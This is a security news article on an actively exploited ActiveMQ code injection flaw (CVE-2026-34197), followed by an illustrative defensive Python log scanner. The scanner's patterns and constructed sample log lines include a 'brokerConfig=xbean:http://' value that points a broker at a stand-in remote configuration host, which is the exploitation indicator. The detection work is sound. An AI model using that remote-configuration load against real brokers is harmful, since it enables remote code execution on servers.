A serious vulnerability in Apache ActiveMQ is leaving thousands of servers exposed, and there is already evidence of attacks under way. The non-profit research group Shadowserver has detected more than 6,400 IP addresses with Internet-accessible ActiveMQ instances that are still vulnerable to a high-severity code injection flaw.
ActiveMQ is one of the most widely deployed open source message brokers in Java environments for asynchronous communication between applications. Its popularity makes any serious flaw an attractive target for attackers seeking remote code execution or lateral movement inside compromised networks, so the emergence of this flaw has caused immediate alarm among security teams and administrators.

The weakness, tracked as CVE-2026-34197, was identified by researcher Naveen Sunkavally of Horizon3, who documented how it went unnoticed for more than a decade and that he used AI assistants to speed up the investigation. The technical root cause is insufficient input validation that allows authenticated actors to force the execution of arbitrary commands on unpatched instances. The ActiveMQ project's official advisory was published on March 30 and lists the fixed versions: ActiveMQ Classic 6.2.3 and 5.19.4 (Apache announcement).
The Shadowserver data also show a worrying geographical distribution: almost half of the detected instances are in Asia, with significant concentrations in North America and Europe as well. This public visibility makes it easier for attackers who scan the Internet for vulnerable installations, and according to the US agency itself, exploitation has already been observed in real environments.
In the face of evidence of active exploitation of the flaw, the US Cybersecurity and Infrastructure Security Agency (CISA) issued a warning and set a deadline for federal agencies to secure their servers. CISA notes that this type of defect is often fertile ground for malicious actors and recommends applying the vendor's mitigation, following the applicable guidelines for cloud services (BOD 22-01), or discontinuing use of the product if no protections are available.
System administrators should not wait: the most effective measure is to apply the official patches and upgrade to the fixed versions. If an immediate update is not feasible, temporary mitigations and perimeter controls can reduce exposure, but they are no substitute for the fix. Horizon3's researchers themselves advise inspecting the broker logs for suspicious connections that use the internal VM transport and for strings containing the parameter brokerConfig=xbean:http://, indicators that may point to exploitation attempts or attempts to load malicious configurations (Horizon3 disclosure).
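As an added illustration of the log review described above (this is example code, not from the article or from Horizon3), the following script scans broker log lines for the two indicators the researchers name: a brokerConfig parameter pointing at a remote xbean URL, and use of the internal vm:// transport. The log line format and the regular expressions are constructed for this example and are not real ActiveMQ output; adjust them to your broker's actual log format.

```python
import re
from urllib.parse import unquote

# Indicator 1 (from the article): brokerConfig=xbean:http:// or https://, with
# optional whitespace tolerated. Indicator 2: the internal VM transport (vm://).
# Both patterns are assumptions for this example, not Horizon3's detection logic.
XBEAN_REMOTE = re.compile(r"brokerConfig\s*=\s*xbean\s*:\s*https?\s*:\s*/\s*/", re.I)
VM_TRANSPORT = re.compile(r"\bvm:\s*/\s*/", re.I)

def classify_line(line: str) -> list[str]:
    """Return the indicator names found in one log line (URL-decoded first,
    so percent-encoded variants of the parameter are not missed)."""
    decoded = unquote(line)
    hits = []
    if XBEAN_REMOTE.search(decoded):
        hits.append("remote-xbean-brokerConfig")
    if VM_TRANSPORT.search(decoded):
        hits.append("vm-transport")
    return hits

def severity(hits: list[str]):
    # A remote xbean brokerConfig is the strong signal. vm:// on its own is
    # normal for legitimate in-process clients, so it is only flagged for review.
    if "remote-xbean-brokerConfig" in hits:
        return "high"
    if hits:
        return "review"
    return None

def scan_log(lines):
    """Return one finding per suspicious line: line number, severity, indicators, text."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits = classify_line(line)
        sev = severity(hits)
        if sev:
            findings.append({"line": n, "severity": sev, "indicators": hits, "text": line.strip()})
    return findings

# Constructed sample log (not real ActiveMQ output); addresses are documentation ranges.
SAMPLE_LOG = [
    "2026-04-01 10:00:01 INFO  Connector openwire started",
    "2026-04-01 10:02:13 INFO  Connection from tcp://198.51.100.7:51234 established",
    "2026-04-01 10:02:14 WARN  Transport connection to vm://localhost?brokerConfig=xbean:http://203.0.113.9/cfg.xml",
    "2026-04-01 10:05:00 INFO  Connection from vm://localhost#1 established",
    "2026-04-01 10:07:42 WARN  Failover URI: failover:(tcp://10.0.0.5:61616)?brokerConfig%3Dxbean%3Ahttp%3A%2F%2F203.0.113.9%2Fcfg.xml",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['severity']} {f['indicators']} :: {f['text']}")
```

Feed the script your real broker log (one line per list element) and triage the "high" findings first; "review" entries only mean the VM transport appeared and need context before being treated as malicious.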
This incident does not arise in a vacuum: ActiveMQ has appeared in warnings about active exploitation before. CISA has included earlier vulnerabilities in the project in its catalogue of known exploited vulnerabilities, such as CVE-2016-3088 and CVE-2023-46604, the latter linked to ransomware campaigns that exploited a 0-day. This track record confirms that exploitation patterns and tooling for compromising brokers are well documented and available to attackers.

For technical teams and product managers the task list is clear: identify all exposed ActiveMQ instances, prioritise upgrading to the versions published by Apache, review logs and telemetry for signs of unauthorised access, and evaluate network controls that limit access to the service from the Internet. If you manage cloud services, also check the configuration and apply the security guides specific to that environment, as CISA recommends.
The combination of an old vulnerability, the ease of exploiting it and the number of servers detected makes CVE-2026-34197 a threat that requires immediate attention. For official sources and further technical information, see the NVD entry for CVE-2026-34197, the Horizon3 technical disclosure (the researcher's analysis), the Apache security notice and the Shadowserver exposure dashboard.
If you are an administrator, do not leave it for later: update, review the logs and limit public access. If you are responsible for risk, push for the patch to be applied with priority. In security, the difference between detection and timely remediation can be the difference between a minor incident and a major crisis.